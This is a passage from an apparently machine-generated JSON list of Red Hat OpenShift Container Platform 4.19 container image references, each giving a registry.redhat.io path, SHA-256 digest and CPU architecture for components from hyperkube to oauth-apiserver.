"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
